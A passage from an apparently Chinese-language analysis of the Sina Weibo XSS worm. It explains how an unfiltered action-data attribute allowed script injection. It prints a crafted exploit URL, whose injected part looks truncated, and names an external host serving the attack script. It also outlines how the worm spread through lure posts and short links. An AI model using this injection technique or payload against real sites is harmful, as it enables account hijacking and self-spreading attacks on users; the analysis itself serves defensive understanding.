發(fā)布完成后我們查看下網(wǎng)頁(yè)源代碼,如下圖:
很顯然真實(shí)的地址會(huì)被寫入到action-data的屬性中去,因此不難想象漏洞產(chǎn)生原因,由于action-data的值沒(méi)有進(jìn)行合適的過(guò)濾,導(dǎo)致攻擊者可以輸入畸形的數(shù)據(jù)插入JS腳本,閉合前面的雙引號(hào)和尖括號(hào),從而造成XSS攻擊。
構(gòu)造Xss_Exploit如下:
http://weibo.com/pub/star/g/xyyyd"> ?type=update
注:
//www.2kt.cn/images/t.js是一種合法的協(xié)議寫法,與http://www.2kt.cn/images/t.js效果一樣。
完整模擬攻擊者的攻擊手段:
1 首先將攻擊腳本存放在www.2kt.cn服務(wù)器上
2 建立惡意用戶,利用構(gòu)造的XSS_Exploit發(fā)布微博消息
3 通過(guò)發(fā)布吸引力強(qiáng)的熱門的話題讓有影響力的人訪問(wèn),中招者自動(dòng)發(fā)微博并進(jìn)行傳播
在攻擊過(guò)程中,攻擊者多次利用短連接將真實(shí)的URL進(jìn)行轉(zhuǎn)換,讓一般用戶不易發(fā)現(xiàn),以便更好地延長(zhǎng)蠕蟲(chóng)的存活時(shí)間,短連接在提供簡(jiǎn)短易記的同時(shí),也帶來(lái)了一些新的安全問(wèn)題,攻擊者可以利用這些短連接隱藏實(shí)際攻擊URL來(lái)進(jìn)行攻擊.